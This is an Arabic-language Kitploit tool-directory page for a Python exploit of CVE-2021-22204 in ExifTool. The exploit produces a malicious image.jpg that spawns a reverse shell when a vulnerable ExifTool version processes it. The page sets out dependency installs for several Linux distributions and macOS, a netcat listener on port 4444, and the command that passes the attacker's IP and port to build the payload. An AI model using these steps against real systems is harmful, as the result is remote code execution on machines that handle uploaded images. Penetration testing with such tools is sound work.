Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-22204-exiftool — استغلال Python لثغرة CVE-2021-22204 في ExifTool، يقوم بتوليد صورة خبيثة تُطلق قشرة عكسية عند معالجتها بواسطة الإصدارات المعرّضة للخطر. | Kitploit
أدوات/GitHubGitHub/mr-tuhin/cve-2021-22204-exiftool
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubmr-tuhin/cve-2021-22204-exiftool

CVE-2021-22204-exiftool

استغلال Python لثغرة CVE-2021-22204 في ExifTool، يقوم بتوليد صورة خبيثة تُطلق قشرة عكسية عند معالجتها بواسطة الإصدارات المعرّضة للخطر.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
9210منذ 4 سنواتلم تتم المراجعة بعد
مشاركة

CVE-2021-22204-exiftool

استغلال بلغة Python لثغرة CVE-2021-22204 في أداة Exiftool.

فيديو تعليمي

يوتيوب

root@kitploit:~
    404 غير موجود

المتطلبات

root@kitploit:~
python3 python3-pip djvulibre-bin exiftool

تثبيت المتطلبات

دبيان

root@kitploit:~
    apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip

أوبونتو

root@kitploit:~
    apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip

آرتش لينكس

root@kitploit:~
    pacman -S djvulibre libimage-exiftool-perl python python-pip

كالي لينكس

root@kitploit:~
    apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip

فيدورا

root@kitploit:~
    dnf install djvulibre libimage-exiftool-perl python-minimal python-pip

نظام OS X

root@kitploit:~
    brew install djvulibre exiftool python

راسبيان

root@kitploit:~
    apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip

طريقة التشغيل:

تثبيت متطلبات بايثون

root@kitploit:~
    sudo pip install -r requirements.txt

تشغيل شل عكسي باستخدام netcat

root@kitploit:~
    nc -nvlp 4444

منح صلاحية التنفيذ

root@kitploit:~
    chmod +x exploit.py

تشغيل البرنامج

root@kitploit:~
    python3 exploit.py {عنوان IP الخاص بك} {منفذ الاستماع الخاص بك} 
    

أو

root@kitploit:~
    ./exploit.py {عنوان IP الخاص بك} {منفذ الاستماع الخاص بك}

مثال

root@kitploit:~
    python3 exploit.py 192.168.0.1 4444
    

أو

root@kitploit:~
    ./exploit.py 192.168.0.1 4444

اسم ملف الإخراج هو

root@kitploit:~
    image.jpg
    

حول الثغرة

تم اكتشاف ثغرة CVE-2021-22204 والإبلاغ عنها بواسطة William Bowling. (@wcbowling)

تم إنشاء هذا الاستغلال من خلال دراسة تصحيح exiftool بعد الإبلاغ عن الثغرة بالفعل.

وسيؤدي ملف image.jpg إلى تفعيل الثغرة عند فتحه باستخدام إصدار exiftool المعرض للثغرة.

تنزيل الأداة